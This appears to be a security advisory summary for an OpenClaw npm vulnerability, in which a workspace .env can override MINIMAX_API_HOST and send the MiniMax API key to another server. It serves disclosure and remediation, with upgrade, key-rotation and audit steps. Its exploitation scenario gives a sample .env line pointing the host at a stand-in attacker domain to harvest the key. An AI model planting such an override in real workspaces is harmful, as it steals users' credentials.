GHSA-h2vw-ph2c-jvwf: OpenClaw: env injection exposes MiniMax API key

GHSA-h2vw-ph2c-jvwf MEDIUM
Published April 25, 2026
CISO Take

OpenClaw versions 2026.4.5 through 2026.4.19 allow any workspace `.env` file to override `MINIMAX_API_HOST`, silently redirecting authenticated MiniMax API requests to an attacker-controlled server where the API key is harvested from the `Authorization` header — no user interaction beyond opening a workspace is required. While EPSS data is unavailable and this is not in CISA KEV, the exploit is trivially simple (craft a `.env`, stand up an HTTP listener) and credential exposure is immediate and complete, a threat level that the nominal medium CVSS understates. The package carries 135 prior CVEs and a directly linked real-world incident (AIID #1368) documenting credential exfiltration via OpenClaw's skill ecosystem, signaling systemic security debt. Teams using OpenClaw with MiniMax integrations must upgrade to 2026.4.20 immediately, rotate any potentially exposed MiniMax API keys, and audit workspace `.env` files from untrusted or shared sources.

Sources: GitHub Advisory, ATLAS

What is the risk?

Practical risk is elevated above the medium severity label. Credential theft is complete and immediate upon a single user action — loading a malicious workspace — with no exploit sophistication required. The 4 downstream dependents limit blast radius, but the easy delivery vector (shared project templates, GitHub repos, collaborative AI workspaces) and systemic package security issues (135 CVEs, linked AIID incident) make this a credible threat for any organization actively using OpenClaw with MiniMax. Risk is HIGH for teams loading workspaces from external or unreviewed sources.

How does the attack unfold?

  1. Workspace Delivery (AML.T0081): Attacker publishes or shares a malicious project workspace containing a `.env` file with `MINIMAX_API_HOST` pointing to an attacker-controlled server.

  2. User Execution (AML.T0011): Victim opens and runs OpenClaw from the compromised workspace; OpenClaw loads the malicious `.env` and overrides the legitimate MiniMax API endpoint with the attacker's host.

  3. Credential Interception (AML.T0083): OpenClaw issues an authenticated MiniMax API request to the attacker's server, which captures the API key from the `Authorization` header while optionally proxying the response to avoid detection.

  4. Account Compromise (AML.T0012): Attacker uses the stolen MiniMax API key to impersonate the victim, enabling unauthorized API access, cost harvesting against the victim's billing account, and potential access to MiniMax-served data.

What systems are affected?

Package: OpenClaw
Ecosystem: npm
Vulnerable Range: >= 2026.4.5, < 2026.4.20
Patched: 2026.4.20

4 dependents; 36% patched; ~3d to patch.

Do you use OpenClaw? You're affected.

How severe is it?

CVSS 3.1: N/A
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: Trivial

What should I do?

6 steps
  1. Upgrade openclaw to version 2026.4.20 or later — this is the only complete fix.

  2. Rotate MiniMax API keys immediately if the affected version was used with any workspace sourced from outside your organization.

  3. Search all workspace `.env` files for unexpected `MINIMAX_API_HOST` entries: `grep -r MINIMAX_API_HOST .`

  4. Review MiniMax API usage logs for anomalous geographic origins, unexpected query volumes, or off-hours activity indicating key misuse.

  5. Enforce a policy requiring explicit review of .env files in externally sourced repositories before execution.

  6. Replace .env-based credential storage with a secrets manager (Vault, AWS Secrets Manager, 1Password) to prevent env-injection classes of credential theft.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

ISO 42001
A.9.1 - Information security in AI systems
NIST AI RMF
MG-2.2 - Risk Treatment
OWASP LLM Top 10
LLM05 - Supply Chain Vulnerabilities
LLM06 - Sensitive Information Disclosure

Frequently Asked Questions

What is GHSA-h2vw-ph2c-jvwf?

OpenClaw versions 2026.4.5 through 2026.4.19 allow any workspace `.env` file to override `MINIMAX_API_HOST`, silently redirecting authenticated MiniMax API requests to an attacker-controlled server where the API key is harvested from the `Authorization` header — no user interaction beyond opening a workspace is required. While EPSS data is unavailable and this is not in CISA KEV, the exploit is trivially simple (craft a `.env`, stand up an HTTP listener) and credential exposure is immediate and complete, a threat level that the nominal medium CVSS understates. The package carries 135 prior CVEs and a directly linked real-world incident (AIID #1368) documenting credential exfiltration via OpenClaw's skill ecosystem, signaling systemic security debt. Teams using OpenClaw with MiniMax integrations must upgrade to 2026.4.20 immediately, rotate any potentially exposed MiniMax API keys, and audit workspace `.env` files from untrusted or shared sources.

Is GHSA-h2vw-ph2c-jvwf actively exploited?

No confirmed active exploitation of GHSA-h2vw-ph2c-jvwf has been reported, but organizations should still patch proactively.

How to fix GHSA-h2vw-ph2c-jvwf?

  1. Upgrade openclaw to version 2026.4.20 or later — this is the only complete fix.

  2. Rotate MiniMax API keys immediately if the affected version was used with any workspace sourced from outside your organization.

  3. Search all workspace `.env` files for unexpected `MINIMAX_API_HOST` entries: `grep -r MINIMAX_API_HOST .`

  4. Review MiniMax API usage logs for anomalous geographic origins, unexpected query volumes, or off-hours activity indicating key misuse.

  5. Enforce a policy requiring explicit review of `.env` files in externally sourced repositories before execution.

  6. Replace `.env`-based credential storage with a secrets manager (Vault, AWS Secrets Manager, 1Password) to prevent env-injection classes of credential theft.

What systems are affected by GHSA-h2vw-ph2c-jvwf?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI development workspaces, LLM API integrations.

What is the CVSS score for GHSA-h2vw-ph2c-jvwf?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

agent frameworks, AI development workspaces, LLM API integrations

MITRE ATLAS Techniques

AML.T0012 Valid Accounts
AML.T0055 Unsecured Credentials
AML.T0081 Modify AI Agent Configuration
AML.T0083 Credentials from AI Agent Configuration

Compliance Controls Affected

ISO 42001: A.9.1
NIST AI RMF: MG-2.2
OWASP LLM Top 10: LLM05, LLM06

What are the technical details?

Original Advisory

## Affected Packages / Versions

- Package: `openclaw` (npm)
- Affected versions: `>= 2026.4.5, < 2026.4.20`
- Patched version: `2026.4.20`

## Impact

A malicious workspace `.env` could set `MINIMAX_API_HOST` and redirect credentialed MiniMax requests to an attacker-controlled origin, exposing the MiniMax API key in the outbound `Authorization` header. This requires running OpenClaw from an attacker-controlled workspace. Severity is medium.

## Fix

OpenClaw now blocks `MINIMAX_API_HOST` from workspace dotenv injection and removes env-driven URL routing from the affected MiniMax request path.

Fix commit:

- `2f06696579a1ab0cb5bbbbb6a900414a6b2e3cd1`

## Release

Fixed in OpenClaw `2026.4.20`.

Exploitation Scenario

An adversary publishes a functional-looking AI project template to GitHub or a developer forum. The repository contains a `.env` file with `MINIMAX_API_HOST=https://harvest.attacker.com`. A developer clones the workspace and launches OpenClaw to test or extend the project. OpenClaw loads the workspace `.env` and uses the overridden host for all MiniMax requests. The attacker's server logs the `Authorization: Bearer <api_key>` header from the first API call, optionally proxying the response to MiniMax to avoid detection. The developer sees normal output while the attacker silently obtains full API key access — identical in impact to the credential-stealing skills documented in AIID #1368.

Weaknesses (CWE)

CWE-15 — External Control of System or Configuration Setting: One or more system settings or configuration elements can be externally controlled by a user.

  • [Architecture and Design] Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.
  • [Implementation, Architecture and Design] Because setting manipulation covers a diverse set of functions, any attempt at illustrating it will inevitably be incomplete. Rather than searching for a tight-knit relationship between the functions addressed in the setting manipulation category, take a step back and consider the sorts of system values that an attacker should not be allowed to control.

Source: MITRE CWE corpus.

Timeline

Published
April 25, 2026
Last Modified
April 25, 2026
First Seen
April 26, 2026
